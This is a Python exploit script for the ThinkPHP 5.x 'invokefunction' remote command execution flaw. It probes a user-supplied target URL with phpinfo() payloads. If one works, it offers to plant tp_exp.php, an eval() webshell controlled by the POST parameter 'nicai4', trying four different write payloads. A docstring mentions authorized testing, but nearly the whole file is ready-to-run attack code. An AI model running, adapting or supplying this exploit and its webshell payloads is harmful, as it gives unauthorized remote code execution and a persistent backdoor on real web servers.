Exploit:

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# @Author: Morker
# @Email:  [email protected]
# @Blog:   https://96.mk/

import requests
import sys

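def demo():
    """Print the banner and a one-line summary of what the script does.

    The ASCII-art rows are raw strings: they contain backslash-pipe,
    backslash-underscore and backslash-space, none of which is a valid
    escape sequence. An ordinary literal only prints them verbatim by
    falling back on the invalid-escape rule, which already raises a
    SyntaxWarning on current Python and is slated to become an error;
    the raw form emits exactly the same bytes without that dependency.
    """
    banner = [
        r'  _______ _     _       _    _____  _    _ _____  ',
        r' |__   __| |   (_)     | |  |  __ \| |  | |  __ \ ',
        r'    | |  | |__  _ _ __ | | _| |__) | |__| | |__) |',
        r"    | |  | '_ \| | '_ \| |/ /  ___/|  __  |  ___/ ",
        r'    | |  | | | | | | | |   <| |    | |  | | |     ',
        r'    |_|  |_| |_|_|_| |_|_|\_\_|    |_|  |_|_|     ',
    ]
    for row in banner:
        print(row)
    print()
    # The tab escape must stay a real escape here, so these are plain literals.
    print('\tThinkPHP 5.x (v5.0.23 and v5.1.31 following version).')
    print('\tRemote command execution exploit.')
    print('\tVulnerability verification and getshell.')
    print('\tTarget: http://target/public')
    print()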
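class ThinkPHP():
    """Probe one ThinkPHP 5.x target for the `invokefunction` RCE and, on request, drop a webshell.

    `web` is the base URL the user typed (the banner suggests
    http://target/public). Every probe is concatenated onto it verbatim, so
    the scheme and the absence of a trailing slash are the caller's job.
    NOTE(review): the banner names 5.0.23 / 5.1.31; presumably the affected
    releases are the ones *before* those fixes — confirm before relying on
    the banner text.

    Only use against systems you are authorized to test. getshell() writes an
    unauthenticated eval() backdoor (tp_exp.php, POST parameter `nicai4`) that
    anyone who guesses the path can drive, so remove it when the engagement
    ends.
    """

    # Per-request timeout in seconds. requests has no default timeout, so a
    # black-holed or rate-limited target would otherwise hang the script.
    TIMEOUT = 10

    # Routes that should run phpinfo(); a hit is recognised by the literal
    # 'phpinfo()' in the response body. Raw strings keep the backslashes of
    # the namespaced class names literal without relying on the
    # invalid-escape fallback (which warns on current Python).
    VERIFICATIONS = [
        r'/?s=index/\think\Request/input&filter=phpinfo&data=1',
        r'/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1',
        r'/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1',
    ]

    # Payloads that try to write tp_exp.php, in the original order: a direct
    # file_put_contents, a shell echo with single quotes, a shell echo with
    # caret-escaped angle brackets (presumably for cmd.exe), and finally the
    # template driver's file write.
    GETSHELLS = [
        r'?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=tp_exp.php&vars[1][]=<?php @eval($_POST[nicai4]); ?>',
        r'?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20%27<?php%20@eval($_POST[nicai4]);%20?>%27%20>>%20tp_exp.php',
        r'?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^<?php%20@eval($_POST[nicai4]);%20?^>%20>>tp_exp.php',
        r'?s=index/\think\template\driver\file/write&cacheFile=tp_exp.php&content=<?php%20eval($_POST[nicai4]);?>',
    ]

    def __init__(self, web):
        self.web = web
        # Browser-like headers so the probes look like ordinary traffic.
        self.headers = {
        "User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0",
        "Accept" : "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language" : "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
        "Accept-Encoding" : "gzip, deflate",
        "Content-Type" : "application/x-www-form-urlencoded",
        "Connection" : "keep-alive"
        }

    def _get(self, url):
        """GET `url` with the shared headers and timeout.

        Returns the Response, or None when the transport fails (refused
        connection, DNS failure, timeout). Without this the exception
        would abort the whole run with a traceback.
        """
        try:
            return requests.get(url=url, headers=self.headers, timeout=self.TIMEOUT)
        except requests.exceptions.RequestException as exc:
            print("[-] Request failed: %s" % exc)
            return None

    def verification(self):
        """Fire each phpinfo() probe until one hits, then offer to drop a shell.

        A failed request counts as a miss and the next probe is tried. Any
        answer other than 'y' at the prompt exits the process; a clean target
        prints a no-vulnerability line and returns.
        """
        for probe in self.VERIFICATIONS:
            resp = self._get(self.web + probe)
            if resp is not None and 'phpinfo()' in resp.text:
                break
        else:
            print("[-] There are no vulnerabilities.")
            return
        print("[+] There are vulnerabilities.")
        print()
        if input("[*] Getshell? (y/n):") == 'y':
            self.getshell()
        else:
            sys.exit()

    def getshell(self):
        """Try each write payload and report the first one after which tp_exp.php answers.

        NOTE(review): a 200 on /tp_exp.php is a weak signal. Applications with
        catch-all routing answer 200 for any path, so the reported shell may
        not exist; confirm by POSTing to it before relying on the result.
        """
        shell = self.web + '/tp_exp.php'
        for payload in self.GETSHELLS:
            self._get(self.web + payload)
            probe = self._get(shell)
            if probe is not None and probe.status_code == 200:
                print("[+] WebShell :%s  PassWord :nicai4" % shell)
                return
        print("[-] The vulnerability does not exist or exists waf.")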

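def main():
    """Entry point: show the banner, read the target base URL, run the probes."""
    demo()
    # Normalise the input to the form the banner documents (no trailing
    # slash): the probes append '/?s=...' and '?s=...' themselves, so a
    # pasted 'http://host/public/' would otherwise produce a '//' path.
    url = input("[*] Please input your target: ").strip().rstrip('/')
    if not url:
        print("[-] No target given.")
        sys.exit(1)
    run = ThinkPHP(url)
    run.verification()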

# Only run the interactive flow when executed as a script, not on import.
if __name__ == '__main__':
    main()